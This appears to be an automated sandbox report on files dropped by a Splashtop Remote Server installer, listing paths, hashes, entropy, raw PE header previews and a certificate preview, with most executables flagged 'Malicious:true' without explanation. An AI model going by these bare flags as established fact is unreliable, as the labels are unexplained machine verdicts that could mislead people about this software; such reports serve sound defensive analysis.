                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:e0fF+cHeBuVNocARu+i2ORUREOf1ELzwDAIADtPAibCwwhAtDWNCYfYTdPGHI:e0d+pBgJWPeRU6Of1wzqAIADtPAibCwR
                                                                                                                                                                                                                                                                                                                                  MD5:B0CC769A982AD2BC23BA14C660966FAC
                                                                                                                                                                                                                                                                                                                                  SHA1:BCB654B27F8B71F7FD071297446EA40BD27372F7
                                                                                                                                                                                                                                                                                                                                  SHA-256:94F59ED720B6CABBE7AC14B31D28926BA2FB8622C899C43DCFC052B3A25C741D
                                                                                                                                                                                                                                                                                                                                  SHA-512:EF3158D5B21308906D555661B55A337C6A36B4399C0E1B553AC7C7BE7D8013E99C60D793EA19394B27696FC5262BFD308CD361F8EB6656219239EA45BA9860A4
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3\cOw=..w=..w=...O..k=...c..u=...c..u=...O..]=...O...=...O..u=...O..D=..w=...>..q...b=..q...m=..q....<......A=......v=..w=..u=......v=..Richw=..........PE..L......f...............&.....P....................@...........................,.......+...@.................................\_!......."..............h+..(....).<f...j..p....................k...... j..@............................................text............................... ..`.rdata..............................@..@.data.........!..l....!.............@....rsrc.........".......!.............@..@.reloc..<f....)..h....).............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRDetect.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2462728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.459857808942287
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:nsISvGLEZpUb+j6FB2219FwcJeoF2AYilzveNx1Owj9Kh2PY6MZcqqymk1kHWV9:nsIRL4pURWM9jJeoF2AYilzGNx1Owj9s
                                                                                                                                                                                                                                                                                                                                  MD5:E86B1C2CE7C64D6CDAF9FFF84187BDF6
                                                                                                                                                                                                                                                                                                                                  SHA1:E8565DD2CC09EE3DD8F3F799AC63A443943C1325
                                                                                                                                                                                                                                                                                                                                  SHA-256:A39BBB4A1B879E62BFC69CB26D5D2F05281A2C720F11B207AA8EE69AC37725A4
                                                                                                                                                                                                                                                                                                                                  SHA-512:9284033876F4A7329E8FA199E41E7D2C3230CEF060450687711CE4E319A0BCA951A09F0C8588003BA18C2E10CCDAC85BD43CE21638DCBBC3CF363E9638479BF3
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t.B...B...B.....X.....a..........C.....o...B.......DS..W...DS..U...DS......,S..T...,S..C...B..C...,S..C...RichB...........PE..L......f...............&.8...x.......r.......P....@...........................%.....Y.%...@..................................*..|.......h............l%..(....#.x.......p...............................@............P..$............................text....7.......8.................. ..`.rdata..\....P.......<..............@..@.data...@....p...X...P..............@....rsrc...h...........................@..@.reloc..x.....#.. ...L#.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRDxgiCaptor.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):142344
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.179529890215125
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:gIRS31UwelTwwoJChcq6UfS/Hqvo+h3kcD8DUsWjcd7LXzrd1eM41zjaVi7HxOhg:gIvMg6MSqR4bP/d1eM41qkd/
                                                                                                                                                                                                                                                                                                                                  MD5:9F0297E58EAFE2EA2B7B22A5253049FE
                                                                                                                                                                                                                                                                                                                                  SHA1:2E0D4D9F469FC81CDD6A5FEFA1F9375467C21BCF
                                                                                                                                                                                                                                                                                                                                  SHA-256:EFA0F4E70B8CE495D4F337FF10AD0CB57BEED0F02630152D394398D3720A7620
                                                                                                                                                                                                                                                                                                                                  SHA-512:29EDF6DE20577DF666AA5628B4B2F556030496185F8D25FF02CB085CE07C6FCCE850719E06CAE47D324F1BE417DC5D38EB724BDEA55BD51C66C6A03C04C704D5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e...6...6...6^'86...6^';6...6^':6...6...6...6S.L6...6..&6...6..?6...6..<6...6..b6...6..96...6Rich...6........PE..L......f...........!.....0...........^.......@...............................@............@......................... ...}...$...P.......x................(...........A..8...............................@............@..d............................text..../.......0.................. ..`.rdata...~...@.......4..............@..@.data..../..........................@....rsrc...x...........................@..@.reloc...7.......8..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRDxgiHelper.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):94640
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.423065206229182
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:iYqYiH1S4d7O6R/S4Ka2ogPgz8KT9Tvx2+wAZLvva24:dqYiV+2Su0wTvI+wwva24
                                                                                                                                                                                                                                                                                                                                  MD5:F6F00886EE605DECD561BD3465151BD5
                                                                                                                                                                                                                                                                                                                                  SHA1:2585353A6B42041244661D260CA7885E269A38C6
                                                                                                                                                                                                                                                                                                                                  SHA-256:126EE74EF2F420292FA5FFC120851D8B62854253568483FCE0DFA4B30F25E0E4
                                                                                                                                                                                                                                                                                                                                  SHA-512:A919E02F81520D285F769CF7E92EE25C85F2EB1949A29FFF022328E10937AA779477D6641F98EAE6720C0986B46240B7B3442693C4FBA0F70E0EA17E3517BB2C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........h0...c...c...c...c...c...c...ca..c...c...c...c...c...c...c...c...c...c...c...c...c...c...c...cRich...c................PE..L...Tn.^...........!.........f.......T..............................................u.....@.........................p3..|...h+..P....p...............Z..................................................@...............\............................text............................... ..`.rdata...3.......4..................@..@.data....,...@.......(..............@....rsrc........p.......:..............@..@.reloc...............@..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRFeatMini.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4837896
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.621009199302442
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:2H8FkQJpGB2mIzIpivVk7iHtj8yIFIvBxV5BczSkyCIHItPtSeKdToBJKB4T1Fv0:o8FkQJpGB2mIzIpivVk7iHtj8yIFIvBn
                                                                                                                                                                                                                                                                                                                                  MD5:7A1CFF9C8188D89B1DAC3EDB73EB8EF8
                                                                                                                                                                                                                                                                                                                                  SHA1:9E09BFE1AF5808EEEB8E3D1301BDECE40A280986
                                                                                                                                                                                                                                                                                                                                  SHA-256:678B500736F3FE0111BEC01ADBFB95DDC7997540D4BF8AC8EC7FDB185E128D50
                                                                                                                                                                                                                                                                                                                                  SHA-512:929F27E628183ECD78B18F6C52BB075366D42408E0C9F69BCDF95789101CEFB1DA89B9A6B865D259D538C2ECC7FF64B76C5DEBBA6D044F28991890347EC55983
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$.......!...e...e...e.......N...BL.z...e.......`...i.......d...BL.m......g......g...l.-.d.......t.......u...c.T.d...c...s...c...y...c...........C...............d.......T...e...4...l.*.c............V.d...e.>.d.......d...Riche...........PE..L...t..f...............&.<?...........:......`?...@...........................J.......J...@...................................D.......D...............I..(....H.\<.. .B.p.....................B......FA.@............`?.....<.D.@....................text...\2?......4?................. ..`.orpc...e....P?......8?............. ..`.rdata.......`?......@?.............@..@.data...le...@D..L....D.............@....rsrc.........D......hD.............@..@.reloc..\<....H..>...lH.............@..B........................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRFeature.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4837896
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.621004462703557
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:uH8FkQJpGB2mIzIpivVk7iHtj8yIFIvBxV5BczSkyCIHItPtSeKdToBJKB4T1Fvd:g8FkQJpGB2mIzIpivVk7iHtj8yIFIvBu
                                                                                                                                                                                                                                                                                                                                  MD5:0CEF87003C916A27F6D2819DC190B47E
                                                                                                                                                                                                                                                                                                                                  SHA1:E4A8F6A321E6ABF565D920405455F674B46BA309
                                                                                                                                                                                                                                                                                                                                  SHA-256:15609E7AE9361F24D28B3C6937109BD70B39EDB69723D2910A2A46804F1069FE
                                                                                                                                                                                                                                                                                                                                  SHA-512:29346E56A9B7456B7325EBC0D73A76557B385016CCF02881F01AADF2276A91C1F8420C6A9C352B196F3CBBB7519B976747045EB9042D032EA9CF1200DC27833D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................h...........!..L.!This program cannot be run in DOS mode....$.......!...e...e...e.......N...BL.z...e.......`...i.......d...BL.m......g......g...l.-.d.......t.......u...c.T.d...c...s...c...y...c...........C...............d.......T...e...4...l.*.c............V.d...e.>.d.......d...Riche...........PE..L...t..f...............&.<?...........:......`?...@...........................J.....}.J...@...................................D.......D...............I..(....H.\<.. .B.p.....................B......FA.@............`?.....<.D.@....................text...\2?......4?................. ..`.orpc...e....P?......8?............. ..`.rdata.......`?......@?.............@..@.data...le...@D..L....D.............@....rsrc.........D......hD.............@..@.reloc..\<....H..>...lH.............@..B........................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRManager.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1879560
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.692837223925707
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:eVY2uInpvQsm6j1fJvlKZUlPxDpg2JBXKLyXZCOM1NfIPIO3QbPwTRE3ATweghOf:eVB6zZUhxDbRYyI5BjPLwThSOekpMFh0
                                                                                                                                                                                                                                                                                                                                  MD5:5165C8F2ABCB99B1991D9EE8432FFE32
                                                                                                                                                                                                                                                                                                                                  SHA1:1830EB851E13A5B80357B9B0941E05947390DA99
                                                                                                                                                                                                                                                                                                                                  SHA-256:10629B9BCB7DA31FF8BC980E94F97DFC0DEE9E9C72D6DB75E98C65C7D5C73012
                                                                                                                                                                                                                                                                                                                                  SHA-512:6ADD7F64B8CA53A0908A0555376CAB53AC62363FAEC8B079AC3031FD8767B28702FD1CB817B588A85E21B22B9A309E6A0908FDC2113136D18E08849EEE6ED342
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................@...........!..L.!This program cannot be run in DOS mode....$.......o3k$+R.w+R.w+R.w. .v.R.w. .v.R.w...v%R.w...v;R.w"*.w*R.w-..w*R.w-..v=R.w-..v7R.w-..vCR.w. .v.R.w. .v*R.w. .v.R.w+R.w.S.w"*.w!R.wE..v.R.wE..w*R.w+R.w*R.wE..v*R.wRich+R.w........................PE..L......f...............&.....T.......2............@.......................... ...........@..............................................6...............(.......+...*..p...................@+..........@.......................@....................text...L........................... ..`.rdata...Z.......\..................@..@.data............0..................@....rsrc....6.......8..."..............@..@.reloc...+.......,...Z..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SROpus.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):330248
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.7899102550791
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:4aXIREBEBRS1izV0CyJ8XytTl4jqNzmCPOIAOvQ10:kEhCyCOiqNxjRE0
                                                                                                                                                                                                                                                                                                                                  MD5:7C3B0175C350E6AEA7C5F4F331FB7457
                                                                                                                                                                                                                                                                                                                                  SHA1:46FE50380B66C64A98B08017DC0D8566D9B22847
                                                                                                                                                                                                                                                                                                                                  SHA-256:A83CDFC6ADDAC319E9CF2F950958DB790CA430F96D900B5205828EBE9B2829A8
                                                                                                                                                                                                                                                                                                                                  SHA-512:4B3972EB174AE834B39F34D51D19ACA9EACE14CACC54D0314DFBDE8B38C2A0514E81B5861BEE9CF8465313F6B98DB31B0C2D314B052CC8F5CDF58C7AF7E61AAC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..y..*..*..*.Vc*..*.Va*d.*.V`*..*...+2.*...+..*...+..*..r*..*...*..*..*F.**J.+..**J.+..**Jm*..*...*..**J.+..*Rich..*........PE..L...S..e...........!...%.V...................p............................... .......5....@.....................................(.......0A...............(...........}..p............................|..@............p...............................text...XU.......V.................. ..`.rdata..n....p... ...Z..............@..@.data................z..............@....rsrc...0A.......B..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRSelfSignCertUtil.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):649008
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.592395353162998
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:EevXOcMAzEExDWdMoe3BlkCwkupdTyu7XAgBn4Dy:9ecPzEExCaoeRqFkcTZjAgBnAy
                                                                                                                                                                                                                                                                                                                                  MD5:F8F5641394A455FDCC4E493ECCC7F012
                                                                                                                                                                                                                                                                                                                                  SHA1:02D12D3E6569EB3A669602AB12540DD509F7474C
                                                                                                                                                                                                                                                                                                                                  SHA-256:4B5051DDDB178BA71D1BFFF29D93693FC8DD73B3117A23E06BF6A3815CD7BA35
                                                                                                                                                                                                                                                                                                                                  SHA-512:BEC16EF02A11BC84A8B412B4D3F3142DC5532C88F8712C43FCF2397B4D0B6530D7DC7EBB512413C1E260711C0B5DBC454B8FE6E61886ED536953F8315C9EA74B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......nR.*3..*3..*3..#K1..3..#K'..2..#K ..3..#K7.'3..*3..3..#K..)3..4a0.+3..#K5.+3..Rich*3..........................PE..L.....U..........................................@..........................@............@................................. 1..d.......................0.......pY..`................................................................................text............................... ..`.rdata...-..........................@..@.data....`...@...$...(..............@....rsrc................L..............@..@.reloc.."y.......z...T..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRServer.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4641288
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.425897026212063
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:zwkIugD7YIZS+3dmiicOSHXFzTF4kCb8ti632uUqTXSWJlOY:zolZ166Cb8tiLuUqdJr
                                                                                                                                                                                                                                                                                                                                  MD5:6A5439B60B0A944FEB3949C01F9463C4
                                                                                                                                                                                                                                                                                                                                  SHA1:3D86936ADA8731462ADEC43FEEE7E4426D42549B
                                                                                                                                                                                                                                                                                                                                  SHA-256:63697C0FD1165E34DF964370FFEB8835DAA9CBF622B00F266F12A59836071B05
                                                                                                                                                                                                                                                                                                                                  SHA-512:214B68C78F0C8A40ACF0544F4DD7B8ECDC26981EA920040C44AAA31A33E8B2130ABFC4F28BA97F0AB64DB0D4444943119BF8589A24807F244811288C2707F322
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......D......]...]...]..\...]...]...]...]...]..\&..]..\.]..\...]..\A..]...]#..]..f]...]...\...]...\...]...\...]n..\...]n.d]...]...]...]n..\...]Rich...]........PE..L......f...............&.6 ...&.............P ...@..........................0G......BG...@..................................m'.X.....(...............F..(...`D.......%.p.....................%.......%.@............P ..............................text...<4 ......6 ................. ..`.rdata...d...P ..f...: .............@..@.data.........'..n....'.............@....rsrc.........(.......(.............@..@.reloc.......`D.......C.............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRServer.pem

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PEM certificate
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):5262
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.05232077920498
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:LrdBs5tNThpCwTWYOHS2zkoGwhav1x6s7xPe47Oq1JmIyztq43ZEDRS4bcrkpk7:Hg5tNTDCdRoothav1xd7Be6Ositq43yY
                                                                                                                                                                                                                                                                                                                                  MD5:A8B2B3D6C831F120CE624CFF48156558
                                                                                                                                                                                                                                                                                                                                  SHA1:202DB3BD86F48C2A8779D079716B8CC5363EDECE
                                                                                                                                                                                                                                                                                                                                  SHA-256:33FE8889070B91C3C2E234DB8494FCC174ECC69CFFF3D0BC4F6A59B39C500484
                                                                                                                                                                                                                                                                                                                                  SHA-512:3B1FC8910B462EA2E3080418428795CA63075163E1E42A7136FA688AA2E130F5D3088AB27D18395C8C0A4D76BDC5ED95356255B8C29D49116E4743D269C97BF9
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:-----BEGIN CERTIFICATE-----..MIIFVDCCAzygAwIBAgIBADANBgkqhkiG9w0BAQsFADAuMQswCQYDVQQGEwJVSzEf..MB0GA1UEAwwWU3BsYXNodG9wIEluYy4gU2VsZiBDQTAeFw0xNTA3MDYwMjQ2NTda..Fw0yNTA3MDMwMjQ2NTdaMC4xCzAJBgNVBAYTAlVLMR8wHQYDVQQDDBZTcGxhc2h0..b3AgSW5jLiBTZWxmIENBMIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEA..wAXrbbT7bxfdfXv4WpeKYQwEj+O5IbELiqJUnjtSL8dhSLjunEnT08eNngGtUbKU..K9UYvokPo4w9dV7ZF2SIVNLLhGINgWfKGjFEOC2HMMxF6/Npjps8UdO3zozZtDET..4InDRAPDAQDuJX2le8sbmwcN6viuMPHQH/zM4VDg86txN/ueO+MHK4PR41dxNU6g..Mi1w4rntp1/alPtJi49CmxkonTzoWZsRz4QJAUJxEFmI4/2C9fKNEdiQUazHIXc1..55qeMTyaLna1ElRl1hpqvH4N7FChuXkG3ncEQRBZr41MCCX1l6PX1MGmbu6CRmEn..dzyu2fKQdnJ2nLzOzNRBuhEv/1Jm0Sij7b0QSberPSw0BqbVOZKY4b93ZRlqrkoD..K8LxS2/DtBvoeHxbF6UV6e4xHOpPDLlOLyfi27LYipTDN3Bt9yxUzcerLMu5KhZG..US8Alv80m+pnnsoSE6C4WN+/iDeRS2K8/BxY1TyFNAYRnC1sVaqwT/0AWHamKmXI..siGuKNMNSOB/pMx+qMFmvdYLMG/FHz6kBghyaqAaSOAcHzU6JJEOmy5PfyJ1VEVT..5ZeHGhwJ6FebFVAbpyTVRslokF6N2BXUuflN8N0Rp/8d5kr8ncHgd4boM16nl+T8..NMjiA0DkFktJHxnIKUEUH0nAIimvRt6+VTGIiXiPZbMCAQO

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRService.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2511880
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.475677303629566
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:lg7zR9eEI15gh4I8pQAjXjrtWq5Do7ZaxplLfNSOqs55VMEzr1kHW9bScbb7:+hU715C4I8GAjzrMq5Do7ZaxplLfNSOl
                                                                                                                                                                                                                                                                                                                                  MD5:46C6DCCB16B36BF5C02C8086F9FC0E63
                                                                                                                                                                                                                                                                                                                                  SHA1:5ADCAE18E82A9539BFC1D3B6EC3673AA0E1C0118
                                                                                                                                                                                                                                                                                                                                  SHA-256:0FD05D2397223D79A5AEC8BDB3F87E22157A08A8BDAF106B7E7CA0DB18219DAC
                                                                                                                                                                                                                                                                                                                                  SHA-512:A8A5A792AA06EF73C58777892B8140005F4A2640B5FF921A175D13B123C193E341D7FD86C15758A1CBB6CA33AEE40F372583B8B54DF4F18915420CF1C147A5E5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a...%l.%l.%l.....>l.....l.....l....$l.....l.%l.Go.#..0l.#...<l.#...m.K..-l.K.<.$l.%lT.$l.K...$l.Rich%l.................PE..L......f...............&.............G............@...........................&.....G.&...@.....................................T.......`............,&..(....$......j..p....................k......0j..@............................................text............................... ..`.rdata...-..........................@..@.data........0...\..................@....rsrc...`............r..............@..@.reloc........$.. ....$.............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRSocketCtrl.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):403976
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.913397085225153
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:ABn+r/1zHhY39LgwN7krdItd7YtjIRC67P/4HATggyTG:ABa/1zHeKbri0eC6zRggyTG
                                                                                                                                                                                                                                                                                                                                  MD5:4C534EB38F42BC64F08C33182156D8A1
                                                                                                                                                                                                                                                                                                                                  SHA1:EEBD8F8C323E50945A273F1C197E91A9BE17BBAF
                                                                                                                                                                                                                                                                                                                                  SHA-256:7FA2AA9E466E2F3B884D11984E3D68750CBCDDB033F02F8AAC4AEEF1EE02FAA1
                                                                                                                                                                                                                                                                                                                                  SHA-512:97D5182BB70E21C5C6E2D43AA62FCA5A171AED3D3AC97A623A6FC187590CE3595DDBBF8B82B969BE86EA0FED22C5447819A0F72B1304AEF1560BDFD5F0054E98
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......l...(...(...(...c...%...c......FP..>...c...?....P..)....P..9....P..0....P..f...c...%...(.......FP..n...FP..)...FP..)...(.l.)...FP..)...Rich(...................PE..L....P~f...........!...&............................................................?....@.............................T................................(..l.............................................................$.......................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.01.UPX!....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRUACCheck.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):552456
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.861176030476635
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:itF8lYMv83f77f8m8end5Xy+1kvI8k9W91iVXuXskIhTclJX:W8l0h8edk+1kv5K+WhTclJX
                                                                                                                                                                                                                                                                                                                                  MD5:A4364113F00295E390102BF2F3E0A6BA
                                                                                                                                                                                                                                                                                                                                  SHA1:561BDD802A8A166C3E9F2939A1354E73489F2DE3
                                                                                                                                                                                                                                                                                                                                  SHA-256:17BE8D054982B1270FA5DE9A19C7DE974652665008BF6B0C67BE15B10FC92FE3
                                                                                                                                                                                                                                                                                                                                  SHA-512:A1F502F65DC82AA1B5503CD9FA27A8B313B31951A49A7C88F499B5F2FBE149F3963EEA79500FA95786B3F4E7B0B90AA31F7273E8B501E2340839B4B474F1E3DC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
